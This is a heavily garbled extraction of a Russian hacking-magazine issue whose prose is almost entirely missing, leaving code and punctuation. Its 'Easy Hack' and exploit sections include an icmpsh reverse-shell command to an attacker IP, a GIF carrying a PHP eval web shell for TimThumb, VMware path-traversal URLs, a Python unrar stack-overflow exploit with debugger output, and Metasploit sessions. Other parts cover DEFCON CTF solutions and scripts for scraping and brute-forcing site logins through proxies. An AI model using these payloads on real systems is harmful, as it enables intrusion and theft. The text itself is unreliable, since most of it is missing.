CDR CorelDraw. ,
,
. . ,
.
4. .
, ,
. ,
.
. , ,
. :
, . : 90,

. , .

.
,
,
.
.
,
, .


PC ZONE


?
. :
. ,
. ,
. DAVID
, , . .
,
.

,
. -
, .
.
. ,
,
. DAVID-laserscanner.
-, : , .
. .

, ,
.
-, .
,
!


. . ,
: , , . .
! .
. , :
, .
.
(
- ).
(. . ) ,
, .
: .
,
. , ,
.

.
. - ,
- .
: ,
! , .
, , , ,
. . -,



$500, DAVID-LASERSCANNER
STARTER-KIT, ,
- LOGITECH PRO 9000,
, USB- .


3D-

,
( ). -, -
. - ,
, .
.

, .
() ,
, (
). :
.
, ,
45. ,
.
: ,
.


, .
, .

. .
ZBrush Mudbox
. !
TriAngles ,
DAVID. ? , . .
.
.

4-


.
, , .
. :
. , . DAVID
,
. ,

3D-


3D- ( ).
,
. ? , (
)
. .
, :
.
. - ,
.


3D-,
, . , . , (
)
USB- c CCD-, ( ), :
.
, ,
. z


PHREAKING

(po.kumekay.com)



300
Skype- , .
, 5000 ,
. , 300 !
?
- . ,
, .
, ,
, .
, , ,
. , , -, :
, , (, ), , .
.

, , .
-
( 12 , 7 , 600 .) ,
1015 ( ).
.
Segway. ,
.

. (35
) .
.



.
, . , 500700
. .
13 , 2,5
( ).
130 .
. ,
-
.
.
,
-, (. . ,
, ;
). ,
, , , .
,
(600700 ) , : 12- .
, .
:
,
, .
,
. , ,
.
- . ,

(ruby)

xmpp

(ruby)

serial

Arduino


. - .

, .
, .
.
, ,
.
100 ,
: .
,
, , , , , . ,
.

Q1, Q2

IRL530

R1, R2

130

R3, R4

100k

U$1, U$2

MOTOR


,
. ,
110 ,
,
,
.
( 4),
. , : , , , ,
. . , -
-.


. ,
: , WiFi 3G-, ,
XMPP ( GTalk) ,
.
OM-, Arduino.
, . .
10 ,
2 .
( ),
.
( 1), ,
.
, ( ).

, ,
.
(Q1, Q2) IRL530. , 5 ,
. ,
-. -
, , ,
. , . , ,
,
, , ,
. , ,
: . ,


1.

C13

10nF

C1-C3,C5-C10

100uF/25V

C4,C11, C12

100uF/25V

D13

1N4007

D1-D13

1N5819

JP1

Data

Q1-Q8

IRF1310

R1-R8

360R

U$1-U$4

IR2110N

X1

X2

X3

2. H-


PHREAKING

RFP30N06LE Fairchild,
3,3 .
,
H- ( 2),
MOSFET , IRF1310 42 .
4- ,
.
,
IR2110. ,
.
( 2),
. , .
, , , ,
.
- (
goo.gl/r1sr).
,
Arduino. 10 11 . .
.


.
. Skype Google,
,
Ubuntu. ,
.
. PC Arduino.
Ruby Ubuntu (
, Windows,
Cygwin). :

. 0 255, . , 255
, 0 .

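require 'rubygems'
require 'xmpp4r-simple'
require 'serialport'

# Clamp a received value to the 0..255 range that fits into one byte
def to_byte(s)
  [[s.to_i, 0].max, 255].min.chr
end

# Open the serial port the Arduino is attached to
sp = SerialPort.new "/dev/ttyUSB0", 9600
# Log in to the Jabber account used by the robot
im = Jabber::Simple.new("ww@mail.com", "pass")
# Poll Jabber for incoming commands
while(true) do
  im.received_messages do |message|
    # Print the received command
    puts "#{message.body}"
    # The message body holds two space-separated numbers
    a,b = message.body.split(' ')
    # Send both values to the Arduino, one byte each
    sp.write to_byte(a)+to_byte(b)
  end
  # Short pause between polls
  sleep 0.05
end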

ruby telebot.server.rb

sudo apt-get install ruby rubygems


,
Jabber:
sudo gem install xmpp4r-simple
, , :
sudo gem install xmpp4r-simple ruby-serialport

Jabber



,
.
. , RBot'a (teledroids.ru)

,
.

:
(robot-war.ru)
(glavbot.ru)

RBot


,
.
Arduino
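int lPin = 10; // PWM pin of the left motor
int rPin = 11; // PWM pin of the right motor
int command = 0;

void setup() {
  Serial.begin(9600);
}

void loop() {
  // Wait until both bytes of a command have arrived
  if (Serial.available() >= 2) {
    // First byte: value for the right motor
    command = Serial.read();
    analogWrite(rPin, command);
    Serial.println(command, DEC);
    // Second byte: value for the left motor
    command = Serial.read();
    analogWrite(lPin, command);
    Serial.println(command, DEC);
    // Keep the motors running for 300 ms
    delay(300);
  }
  // No command pending: stop both motors
  analogWrite(rPin, 0);
  analogWrite(lPin, 0);
}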

,
. , , , ,

.
, 1 3,
. ,

Enter.

require 'rubygems'
require 'xmpp4r-simple'

@a = 255/3
@im = Jabber::Simple.new("qq@mail.com", "pass")
@recipient="ww@mail.com"

# Read one key press without waiting for Enter
def read_char
  begin
    # Save the terminal state and switch to raw mode
    old_state = `stty -g`
    system "stty raw -echo"
    c = STDIN.getc.chr
    # An escape sequence (arrow key) is three characters long
    if(c=="\e")
      extra_thread = Thread.new{
        c = c + STDIN.getc.chr
        c = c + STDIN.getc.chr
      }
      extra_thread.join(0.00001)
      extra_thread.kill
    end
  rescue => ex
    puts "#{ex.class}: #{ex.message}"
    puts ex.backtrace
  ensure
    # Restore the saved terminal state
    system "stty #{old_state}"
  end
  return c
end

# Turn a key press into a command for the robot
def show_single_key
  c = read_char
  case c
  # Arrow keys
  when "\e[A"
    puts ""
    @im.deliver(@recipient, @a.to_s+" "+@a.to_s)
  when "\e[C"
    puts ""
    @im.deliver(@recipient, "0 "+@a.to_s)
  when "\e[D"
    puts ""
    @im.deliver(@recipient, @a.to_s+" 0")
  # Keys 1 to 3 select the value sent to the motors
  when "1"
    puts "1"
    @a = 255/3
  when "2"
    puts "2"
    @a = 255*2/3
  when "3"
    puts "3"
    @a = 255
  # Esc quits
  when "\e"
    Process.exit
  end
end

# Main loop
show_single_key while(true)


, ,
( ,
) , , , . ,
, ,
, DIP-,
Sparkfun ( sparkfun.com/products/9059
sparkfun.com/products/844).
ArduRoller (github.com/fasaxc/ArduRoller) .

! .

.

?
? ,
100 , ,
. !
!
, , .
ROS (ros.org/wiki/),

WillowGarage PR2 (goo.gl/SDr8) RBot (rbot.ru). z


/ EASY HACK

GreenDog , DSecRG.ru (agrrrdog@gmail.com, twitter.com/antyurin)

EASY
HACK

, -
TCP- back connect. ,
: - , TCP- ?
,
.
DNS- , (
147- ). , ICMP, , Bernardo Damele Nico: reverse icmp
shell. , ( )
ICMP echo request ( ping).
, ICMP echo-reply-
.
, , . -,

back connect,
. -, ,
: raw
socket. , .

icmpsh.exe -t ha.ck.er.ip
, .
,
.

./icmpsh_m.py ha.ck.er.ip vi.ct.im.ip
IP ,
.
Windows, , -, .
, XP, 7-.
Perl, C,
Python. , . ,

ICMP-ping-:
sysctl -w net.ipv4.icmp_echo_ignore_all=1

ICMP-: ,


, sqlmap.
, :
ICMP-.
,
.


MYSQL

,
,
- . ,
.
. , : -
, .

. , .
Load_File().
FILE CREATE TABLE. ,
, LocalSystem.
,
, :
SELECT HEX(LOAD_FILE('C:/test.exe')) INTO DUMPFILE 'c:/windows/temp/blablabla';
CREATE TABLE readtest(data longtext);
LOAD DATA INFILE 'c:/windows/temp/blablabla' INTO TABLE readtest FIELDS TERMINATED BY '\\' (data);
.
. , .

longtext.
. , . .
, FILE,
UPDATE, INSERT, CREATE TABLE. , SELECT INTO DUMPFILE. ,
,
, ,
, . ,
, . -, hex-
1024 . -, :
CREATE TABLE writetest(data longblob);
INSERT INTO writetest(data) VALUES (0x4d5a90..610000);
UPDATE writetest SET data= CONCAT (data,0xaa27000000000000);
[];
SELECT data FROM writetest INTO DUMPFILE 'C:/windows/Temp/test.exe';

.
hex-.
hex-. , ,
exe . (BlackHat 2009, goo.gl/23808).

FRAMEBUSTING-

XSS-track (goo.gl/lXmF8) XSS-. ,


, .
, XSS-: , ,
JavaScript, , .
- ,
.
, .
JavaScript:
<script type="text/javascript">
if(top != self) top.location.replace(location);
</script>

, allow-top-navigation ,

. .
framebusting-
: HTML5- , . ,
.

IE8/9 XSS.
, framebusting,
JavaScript (XSS). IE,
XSS, (,
), framebuster . , XSS-. , (stored XSS reflected, ,
IE-),
IE. , , .

.
, ,
. - .
, ,
.
sandbox, HTML5 .
<iframe src="http://www.victim.com" sandbox="allow-same-origin allow-forms allow-scripts"></iframe>
, .
allow-scripts, . -


/ EASY HACK

XSS

Shell of the Future. ,


, .
HTML5 , COR Cross-origin requests.
-
, .
HTTP-. :
1. XSS.
2. XSS (Shell of the Future).
3. COR.
4. R.
5. COR- .
6. R .
.
JavaScript.
http-.
.
.
framebusting, HttpOnly/
Secure. . , www.andlabs.org/
tools/sotf/sotf.html.

Shell of the Future:

, JSON
Hijacking. ,
,
. , : JSON
, JavaScript
Ajax-. JSON Hijacking
, CSRF (Cross-site request forgery),
.
, , http://
server/secret-info.json GET- (),
, :
["aaaa", "password"]
CSRF , , , ,
:
<script src=http://server/secret-info.json>

JSON-.
JavaScript, JSON, , ,
. ?
, JavaScript
:
<script type="text/javascript">
var secrets;
Array = function() {
  secrets = this;
};
</script>
JSON
, . .
// GET- JSON
<script src="http://server/secret-info.json"
type="text/javascript"></script>
// ( )
<script type="text/javascript">
var yourData = '';
var i = -1;
while(secrets[++i]) {
yourData += secrets[i] + ' ';
}
alert(': ' + yourData);
</script>
.
, .
, ,
,
. Gmail,
2006 :
.
, :
Array.
, , Firefox 2.0.


VMWARE

, ,
. ,

. :
,
, ,
. ,
- .
, . , , , ,
. ,

. : , .
: - Immunity,
.
. ? , .
, . , ,
., vSphere, ESX, ESXi, vCenter,
Server. :
intitle:"Welcome to Vmware ESX"
intitle:"VMware Management Interface:" inurl:"vmware/en/"

( 2009 , ESX 3.5),


CVE-2009-3733.
:
https://victim.com/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E
%2E/etc/passwd
?
, . /etc/
vmware/hostd/vmInventory.xml
vmx.
,
vCenter
. web- jetty 6.1.16 :
https://victim.com/vci/downloads/health.xml/%3F/../../../../../..
/../../../any_file
(vpxd-profiler-*),
vCenter .
vmware_
session_rider.rb, VASTO.
:
1. .
2. MSF:

: 902/903,
vmware- http - vmware httpd.
goo.gl/NdMfy.
?
, . VMware
.
nmap. , : 443-
SOAP-, .
, , ,
. -, VASTO.
Metasploit Framework
, BlackHat 2010 (vasto.nibblesec.org). .
.
:
%msframework%\msf3\modules\auxiliary\vasto ( ). ,

3. vCenter (VI client) : 127.0.0.1:9999.


4. .

ESX 4

VMware


use auxiliary/vasto/vmware_session_rider
set RHOST victim.com
set SOAPID 04D40C81-564E-4511-AC0D-D57FFA571E4E
( )
run

, , vCenter, .
( 5 ), VASTO
vmware_
autopwn.rb.
VMware, , .


iv (ivinside.blogspot.com)
pikofarad (115612, . , .1)

, WordPress,
HP,

Firefox, , ()
.


WordPress TimThumb

CVSSV2

7.5
(AV:N/AC:L/AU:N/C:P/I:P/A:P)

BRIEF
TimThumb WordPress
- timthumb.php, .
40 ,
. ,
,
! - ,
PHP- . , , .
EXPLOIT
, :
http://www.target.tld/wp-content/themes/THEME/timthumb.php?src=http://blogger.com.evildomain.tld/pocfile.php


timthumb.php

THEME , .
, . -, , .
:
$allowedSites = array (
'flickr.com',
'picasa.com',
'blogger.com',
'wordpress.com',
'img.youtube.com',
'upload.wikimedia.org',
'photobucket.com',
);
, strpos
, - ,
URL , . ,
.
, ,
, - PHP-.
,
- , . http://goo.gl/
We45j, GIF-
35 . , 35 , (!)
PHP- , -, . PoC
:
\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00
\xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00
\x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02
\x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65

\x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D
\x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00

GIF- <?php @eval($_GET['cmd']) ?>. timthumb.php
/wp-content/themes/THEME/cache/
, , . : www.exploit-db.com/exploits/17602.
TARGETS
WordPress TimThumb Plugin 1.* 1.32
SOLUTION
. -, : 1.34 .
-, , ,
. -,
,
$allowedSites = array();. , ,
.
, WordPress,
, :
1. SSH.
2. WordPress.
3. grep -r base64_decode *.
, , , .
4. /tmp txt php.


HP LaserJet Pxxxx Series

CVSSV2

7.8

(AV:N/AC:L/Au:N/C:C/I:N/A:N)
BRIEF
: Metasploit Framework

. LaserJet HewlettPackard. , , . ,
PJL (Printer Job Language).
JetDirect-
9100 ,
PJL.

Firefox 3.6.16


EXPLOIT
MSF hp_printer_pjl_traversal hp_printer_pjl_cmd.


heap spraying

.
:
RHOST .
RPATH .
RPORT .
!r FILE ,
/, ..
. , ,
, -
( LynxOS), /etc/passwd, ,
/bin/dlsh.
MSF PJL . RHOST RPORT,
CMD ,
. /etc/
passwd, ,
http://goo.gl/UKesp.

OnChannelRedirect, nsIChannelEventSink,
. ,
OBJECT.
metasploit heap spray ROP- DEP
Windows XP SP3.
EXPLOIT
,
. . use-after-free
:

TARGETS
HP LaserJet Pxxxx Series, , LaserJet .
SOLUTION
.

Firefox 3.6.16 OBJECT mChannel Remote Code


Execution Exploit (DEP bypass)

CVSSV2

10.0

(AV:N/AC:L/Au:N/C:C/I:C/A:C)
BRIEF
: 5 2011 , : Rh0, CVE: CVE-2011-0065.
use-after-free Mozilla Firefox 3.6.16, , , regenrecht, metasploit Rh0.
, mChannel, OBJECT,
HP,


PJL 309 WEP !

;
, .

base/src/nsObjectLoadingContent.h)
.

data OBJECT.
LoadObject OBJECT.

, , - ,
.

. ,
.
, ,
, ++,
.
,
.
content/base/src/nsObjectLoadingContent.cpp:
nsObjectLoadingContent::OnChannelRedirect(
nsIChannel *aOldChannel,
nsIChannel *aNewChannel,
PRUint32 aFlags)
{
// If we're already busy with a new load, cancel the redirect
if (aOldChannel != mChannel) {
return NS_BINDING_ABORTED;
}
if (mClassifier) {
mClassifier->OnRedirect(aOldChannel, aNewChannel);
}
mChannel = aNewChannel;
return NS_OK;
}
OnChannelRedirect,
, OBJECT (
nsIChannelEventSink) mChannel.
, mChannel ( content/


nsObjectLoadingContent::LoadObject(nsIURI* aURI,
PRBool aNotify,
const nsCString& aTypeHint,
PRBool aForceLoad)
{
...
if (mChannel) {
...
mChannel->Cancel(NS_BINDING_ABORTED);
...
}
...
}
metasploit, , heap spraying,
. heap spraying , , , , . 0x7fffffff,
,
ring3 .
heap spraying
, , , , . ,
: nop- + shellcode.
,

, , , , ,
. - nop- . heap
spraying


unrar <= 3.93

, JS-,
, ,
.
MSF
: metasploit,
, Firefox :
msf# exploit(mozilla_mchannel) > set PAYLOAD windows/exec
PAYLOAD => windows/exec
msf# exploit(mozilla_mchannel) > set CMD calc.exe
CMD => calc.exe
msf# exploit(mozilla_mchannel) > exploit
[*] Exploit running as background job.
[*] Using URL: http://0.0.0.0:8080/cnGnlIbrNQYE
[*] Local IP: http://192.168.0.23:8080/cnGnlIbrNQYE
[*] Server started.
TARGETS
Mozilla Firefox 3.6.16
SOLUTION
, .


Unrar 3.9.3 Local Stack


Overflow Exploit

CVSSV2

7.2

(AV:L/AC:L/Au:N/C:C/I:C/A:C)
BRIEF
: 5 2011 , : ZadYree, CVE: N/A.
Unrar *nix- ,
, , RAR.
, ZadYree,
, .
EXPLOIT
:
import sys
from struct import *
buf = '-' + '3lrvs'*817 + 'AAA' + pack('I',0x8070197)
shellcode = "\xcc\xcc\xcc\xcc\xaa\xaa\xaa\xaa\xbb\xbb\xbb\xbb\xcc\xcc\xcc\xcc\xdd\xdd\xdd\xdd"
f = open('expl_option', 'wb')
f.write(buf + shellcode + '\012')
f.close()
, ,
, 0x8070197 .
.
esp, jmp esp ( ,
), ,
jmp esp.
unrar.
(^-^) objdump -D /usr/bin/unrar | grep "ff e4" | grep jmp
806febf: ff e4    jmp *%esp
8070197: ff e4    jmp *%esp
8070317: ff e4    jmp *%esp
807038f: ff e4    jmp *%esp
8070527: ff e4    jmp *%esp

, :
(^-^) gdb --args unrar `cat expl_option`
(no debugging symbols found)
(gdb) r
Starting program: /usr/bin/unrar -3lrvs3lrvs3lrvs...s3lrvsAA...
...
ERROR: Unknown option: 3lrvs3lrvs3lrvs...3lrvsAA...
Program received signal SIGTRAP, Trace/breakpoint trap.
0xbfab6405 in ?? ()
1: x/i $pc
0xbfab6405: int3
(gdb) x/20x $eip-1
0xbfab6404: 0xcccccccc 0xaaaaaaaa 0xbbbbbbbb 0xcccccccc
0xbfab6414: 0xdddddddd 0xbfab6400 0x08067f22 0x0806ec60
0xbfab6424: 0xbfabfdfa 0x08048b97 0xb7483a8c 0x00000000
0xbfab6434: 0x00000000 0xbfab6a98 0x080680e7 0xbfab7f98
0xbfab6444: 0xbfabfdfa 0x08048c77 0xb7483a8c 0x08048460
(gdb)
.
.
TARGETS XXX
unrar <= 3.93
SOLUTION
, , , .

unrar, . z


zyx2145 , @Kaspersky Lab


touzoku , @

DEFCONCTF

-
-
: BlackHat 2011 DEFCON 19.

,
Capture The Flag (CTF),
.

-, .


WWW

0X01. CTF?

:
Hackerdom:
www.hackerdom.ru;
Leet More:
leetmore.ctf.su;
SiBears:
sibears.ru;
Smoked Chicken:
smokedchicken.org.

Capture the Flag ,


-.
, , ,
,
. . , , ,
. CTF:
. , ,
CTF .
, UCSB
iCTF, NuitDuHack, plaidCTF, RuCTFE . DEFCON CTF 1996 .
, , .
4- .
, ( iCTF), -,
POSTECH-Pohang, , , . .


0X02. DEFCON CTF PREQUALS


Defcon CTF Jeopardy .
.
2530 ,
reverse engineering, forensics, binary exploitation, packet analysis
. .
,
. ,
,
.
, .
700 ,
280. , Team IV, :
Hackerdom ;
Leet More - , ;
SiBears ;
Smoked Chicken - .
,
DEFCON CTF .
, 4-
12 , . .
GRAB 100
- SPDY
5932 . , apache,
SPDY ( HTTP Google). /cgi-bin/
http://pwn583.ddtek.biz:5932/cgi-bin/phf?Qalias=%0Acat%20/home/Tkf6zKZd/key. ( key). :
http://pwn583.ddtek.biz:5932/cgi-bin/phf?Qalias=%0Acat%20/home/Tkf6zKZd/k*. :
that's fast enough now go take a rest.
FORENSICS 200
NTFS
50
NTFS . MBR , .
X-Ways Forensics, ,
100 dir**, 220
. 21 978 , ,
([0-9a-f]\0{24}){40}.
ntfswalk, \
dir60\key50883. ,
$MFT NTFS- c 110h,
NTFS
100h.
110h-
X-Ways Forensics, (
), ,
, . ,
NTFS 80h,
.
, , NTFS. ,
(
). , : 47a96fac9edb95e641
e835e21ce800934d4c8f7e.


POTENT PWNABLES 500



, upload_new_record class01 class02
. class_02::copy_buffer , 24 .
void class_02::copy_buffer(class_02 * this, char * buffer)
{
unsigned int i;
for (i = 0; i <= 248; ++i) this->buffer[i] = buffer[i];
}
, buffer_len class_count, dump_obj,
,
buffer_len. , , , hash_str rb_tree_item.
view record, , rb_tree_item.
rb_tree_item,
. vftable,
, ,
. .
BINARY L33TNESS 500
PE-
, :
CloseHandle;
HeapAlloc;
memset.
,
, , PEB OEP.
.
:
NtQueryInformationProcess with (push 1eh ; ProcessDebugObjectHandle);
Rdtsc check;



0X03. . CTF

CREDITS
IV ( , ),
,
: - , -
, - .

,
, .

,
. ,
, , ,
, jail.
. .
.
,
.
, . ,
Rio, , :
- .
DEFCON CTF,
. ? ,
sheepfucking,
, . ,

,
?

NtSetInformationThread with (push 11h ; ThreadHideFromDebugger).


, ,
, .
,
, .
,
.
.
,
. , ,
: 080052000800520008005200080052000800520008005
2000800520008005200. , : 2FE3903DF19E4B01AC590FBA67
1DC8752BD68339E49147F29F5502AD6310BB71.



14
. DEFCON CTF
Binjitsu ( binary + -), .
ELF .
, -,
. :
.
, -
.
, .

: Castle
: 7629
:
EOF\n.
/tmp/castleXXXXXXXX, XXXXXXXX
. castle stdin, stdout stderr
/usr/local/bin/sandy
-o <IPv6> -d -s /tmp/castleXXXXXXXX, IPv6
, .
: sandy.
: . sandy.
: Bunny
: 15323
:
srand(time(0)) (max_size) 5
34.
(rand_port),
1024 65 534,
(bind+listen).
, 1 12 .
max_size .
: , max_size 34 ,
haystack 12
. . -,
, ,
1024 65 534. , seed

time(0), . -,
, ,
. ,
max_size , ret-
haystack, ,
,
, .
:
. , ,
- ,
. , .
: Hiver
: 44366
: :
4 , .
, 10 -.
key
. ,
.
10 .
- ,
,
.
: ,
,
.
: , ,
,
0 , .
, , .


CTF?
The UCSB iCTF
ictf.cs.ucsb.edu
,
. ,
, , 2008 . ,
,
.
CODEGATE CTF
www.codegate.org
.
34 CTF,
. CODEGATE CTF,
,
task-based-.
RUCTFE
www.ructf.org
Hackerdom
, CTF CTF . 2007 .
RuCTF.
2009 . , ,
.
plaidCTF
www.plaidctf.com
PPP -,
2009 ., .
,
.

(gameboard) .
PHD CTF
phdays.ru/ctf_general.asp
Positive Hack Days CTF ,
2011 .
, , .

,

,
,



, (
)
20 .
, . .

.
, - .
CTF ,
, LAN- (
), .
, $300
, . .
. ,
. , .
, ICMPv6-. , IPv6-, , World IPv6 Day. ,
IPv6.
.
FreeBSD 8.2, Jail. ,
Jail FreeBSD, - . ,
Jail, .
Jail . ,
, ,
. :
,

, , ,
, ,
, .
/
-.
, .
, ,
100%- .
, , . ,
.


: Forgetu
: 3128
: .
-
, ,
. : ,
0xB33007D3 (
, ).
0xFC1BE02A, .

127 , .
: ,


. -
(data) 128 ,
( RacvDataFromSocket).
: ,
,
.

0X04.
,

. ,
. CTF
. , , ,
- , rm -rf
/, . tomato
root tomato,
tomator.
, root . ,
, , , .
lollersk8terz Jail, -.
, -
,
, .
, , -
. PLUS@Postech , ssh
. DEFCON
, .

0X05. WHAT HAPPENS IN VEGAS STAYS IN VEGAS


29- Bellagio
after party c
. ,
, 15 000
Black Hat DEFCON ,
. , CTF, : ,
RuCTF, , Leet More CTF, CITCTF
. ,
,
! ,
, , - .
. z


: Sandy
:
: Sandy
.
: castle ,
,
. . , fopen

.
: Fopen ,
fprintf,
.
: Sheepster
: 5775
:
. ,
: Welcome to the ddtek blog.

, .
:
zzyzxrd. , (flag),
fputs fprintf
. x`lXPPTH@8
(
xevgdirkhe),
fputs. , ,
. ,
.
:
hiver,
. ,
, ,
,
. ,
.
, .


.
DDoS-
. 1999 .

,
. ,
. ,
, , DDoS, ,
. ,

.
, .
,
,
( -
). , . ,
.
, Malware
as a Service. -
,
, . ,
.
, Zbot (Zeus), Spyeye, Mariposa, Black Energy, ButterFly,
Reptile. ,


- . , ,
, , , ,
.
,
, , . , ,
Microsoft, .

MICROSOFT VS.

. ?
, , :
Rustock, 80 % .
Coreflood, , $100 .
Waledac, 1,5 -
. FTP.

, - , Microsoft
.
SDL,

( , ). ,
, , .
.

. Digital Crime
Unit, Microsoft Security Response Center, Microsoft Malware Protection
Center, Trustworthy Computing,
. Microsoft

,
.

( ) , Command & Control,
C&C.
. IRC. , P2P- ,
.

,
Facebook. ,
:


&C-.
DDoS &C-.
, C&C-.
DNS-, C&C.
IP .
.
.

, ,
.
. , Rustock Coreflood . &C-
.

.
Waledac ,
.

,
, Windows -.
Linux/Unix Psyb0t, Chuck Norris, .
, NAS .
,
Linux .

,
. 2009 ,

.

WALEDAC:
Waledac .
277 . ,
. ,
P2P-.
, . Waledac , . ,
, NAT
80 , , ()
, .
. - ,
100 , ,
P2P .
- fast flux
DNS. ,

Waledac


Microsoft Waledac


-,
.
-
.
. , ,
,
80- , .
,
.
- C&C.

ICANN TRO (temporary


restraining order) 28 .
, DNS-
.
Microsoft Pfizer. Microsoft
Pfizer.
Microsoft
, ,
. ,
, .
,
. Microsoft
, .

Microsoft (bit.ly/rlDUDA).
DNS
Microsoft. DNS-
Microsoft. ,
, ,
. , Microsoft
Waledac, , C

, Microsoft Security Essential Malicious
Software Removal Tool.

WALEDAC:
,
:
1. p2p- .
2. DNS/HTTP-.
3. C&C-.
P2P-.
,
, ,
20 ,
, .
,
, P2P.
-
Microsoft.
P2P-
fast flux DNS.
,
.
,
. DNS ICANN Uniform Domain-Name
Dispute-Resolution Policy .
, ,
DNS-,
.


Waledac.
, Microsoft .
$250 000 , ,
, Rustock (bit.ly/oR7x88). , .
, Microsoft
, . z


qbz (cayd@yandex.ru)

LINKS
bit.ly/qV15Z8

cURL.
bit.ly/oMBmcW

LiveHTTPHeaders
Mozilla Firefox.

-



.



mamba.ru slil.ru.

DVD

,

slil.ru.



.

HTML-,
slil.ru

,
-
: , ,
.
, , .
: , . ,
,
.
, :
CAPTCHA;
(cookie, );
;
JavaScript-;
;
flash;
, .

,
, :
.

, , .
, slil.ru.
, -
, ,
, . ,
:
.
PHP.
cURL.
LiveHTTPHeaders Mozilla Firefox.


, . ,
. ,
. HTML-
.
.
:
1. file_get_contents().
PHP- allow_url_fopen.
.htaccess- Apache (php_flag allow_url_fopen on). ,
PHP
HTTP-. :
$settings = array('http' => array('method' => 'GET', 'header' =>
"User-Agent: []\r\n".
"Accept: text/xml,application/xml,application/xhtml+xml;q=0.5\r\n".
"Accept-Language: en-us,en;q=0.5\r\n".
"Accept-Encoding: gzip,deflate\r\n".
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7"));
$settings = stream_context_create($settings);
$html = file_get_contents('http://url.tld/', NULL, $settings);
2. (fsockopen() ,
).
3. cURL.

LiveHTTPHeaders

.
.
.
,
( cURL
file_get_contents).

,
CAPTCHA



/.

.
,

5 %.
API
.

-,

: 90 %.

.
XSS-
.
XSS
,

.

, .


,

.
-

.


.

.

, ,
,
.

- ,

.
.
cookie-,
.

,
.


JavaScript-
,
,
SSL, , ,

.
PHP cURL,
, .
JavaScript-,

(
JavaScript:
)
js-,
,
, .

HTML- .
Opera
DragonFly
LiveHTTPHeaders.
,
POST-, GET- COOKIE-

.
.




,

. ,
, 5000 .
,
, CMS
.

:
IP-
.
,
1000
,
20- ? socks- proxy-.
IP-, , 100 IP-. ,
100 20, 2000
,
.



$curl = curl_init();
$head = array(
'Host: slil.ru',
'User-Agent: []',
'Accept: text/xml,application/xml,application/xhtml+xml;q=0.5',
'Accept-Language: en-us,en;q=0.5',
'Accept-Encoding: gzip,deflate',
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Keep-Alive: 300',
'Connection: keep-alive'
);
// , LiveHTTPHeaders
curl_setopt($curl, CURLOPT_URL, 'http://slil.ru/31402491');
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_HTTPHEADER, $head);
curl_setopt($curl, CURLOPT_ENCODING, 'gzip,deflate');

slil.ru

$out = curl_exec($curl); //
curl_close($curl); //

17 ,
slil.ru/31402491 $out.
, :

cURL, , . . Mozilla Firefox


LiveHTTPHeaders.
slil.ru/31402491 .
, .
:

$filedata = explode('<p align="center">', $out);


$filedata = explode('</p>', $filedata[1]);
list($filename, $filesize) = explode('&nbsp;&nbsp;&nbsp;',
trim(strip_tags($filedata[0])));
$temp_link = explode('var l1nk=\'', $cResult);
$temp_link = explode('\';', $temp_link[1]);
$temp_link = trim(str_replace("'+'", '', $temp_link[0]));
$data = array('name' => $filename, 'size' => $filesize,
'link' => $temp_link);

GET /31402491 HTTP/1.1


Host: slil.ru
User-Agent: []
Accept: text/xml,application/xml,application/xhtml+xml;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

,
.

? cURL. ,
. , :

, ,
.


function genLinks($from, $to)
{

3


,

. ,

,

.

:


(antigate.com)
, ,
.

JPG, GIF PNG.

1 . 1000 .
10 % , ,
- .

(captchabot.com) , .

(80 %),
API. 30
, 30 .

,
.

Death by Captcha
(deathbycaptcha.com) ,
.
1,39 . 1000
.
17
90 % .
API.


$i = 0; $links = array();
for ($i = 0; $i <= ($to - $from); $i++)
{
$links[] = 'http://slil.ru/'.($from+$i);
}
return $links;
}
$links = genLinks(31402491, 31402591);
100 slil.ru 31402491 31402591
. .
, .
cURL :
1. ,
.
2. curl_multi_exec,
.
3. curl_multi_getcontent.

parseLinks() :

clickUrl=http%3A%2F%2Fmamba.ru%2Ftips%2F%3Ftip%3DLogin&target=&login_captcha=&login=xxx&password=x1x2x3&VAnketaId=0&RedirectBack=http%253A%252F%252Fmamba.ru%252Findex.phtml%253F
API mamba.ru/ajax/login.phtml?XForm=Login.


. ,
, cookie. , , POST.
.

PHP + cURL.
API , .
:
{"t":"0000000000000","a":00000000,"s":1,"e":0,"d":[],"r":0,"XForms":{"Login":{"found":"\u041d\u0435\u0432\u0435\u0440\u043d\u043e\u0443\u043a\u0430\u0437\u0430\u043d \u043b\u043e\u0433\u0438\u043d\u0438\u043b\u0438 \u043f\u0430\u0440\u043e\u043b\u044c"}}}

$info = parseLinks(genLinks(31402491, 31402591));


:
, - , 1000 , slil.ru, 31402491
31402591. . , , , ,
. , ,
, .



(www.mamba.ru).
, :
1. .
2. .
3. , , false, true.
. , .
, , ,
.
, :
- ,
Ajax API.
, html-,
, 100300
API, . ,
API.
API. html JavaScript-, , ,
LiveHTTPHeaders.
,
, ,
/ :
POST /ajax/login.phtml?XForm=Login HTTP/1.1
Host: mamba.ru
...
Cookie: mmbsid=b8HMuKD6KEILm9GTm5Z0eOMnBLtFy6Xp
...

{"t":"0000000000000","a":"00000000","s":1,"e":0,"d":[],"r":"http%3A%2F%2Fmamba.ru%2Ftips%2F%3Ftip%3DLogin","XForms":0}
,
"r":"http%3A%2F%2Fmamba.ru%2Ftips%2F%3Ftip%3DLogin",
. ,
, .
, .


1000
, ,
. -
, . ,
:
{"t":"1311437340338","a":0,"s":1,"e":0,"d":[],"r":0,"XForms":0,"captcha":1}
, IP-,
. ( ), IP-
cURL:
curl_setopt($curl, CURLOPT_PROXY, '12.34.56.78:80');
,
, ,
.

,
-
. , ,
, , ][-

, , ,
.
, ! z


GreenDog, DSecRG.ru, Digital Security (agrrrdog@gmail.com)

, Microsoft,

Windows, . , ,
, .

,
.
. - .
, .
,
, -, , -,
, .
.
.

?
, ( Group
Policy)
.
,
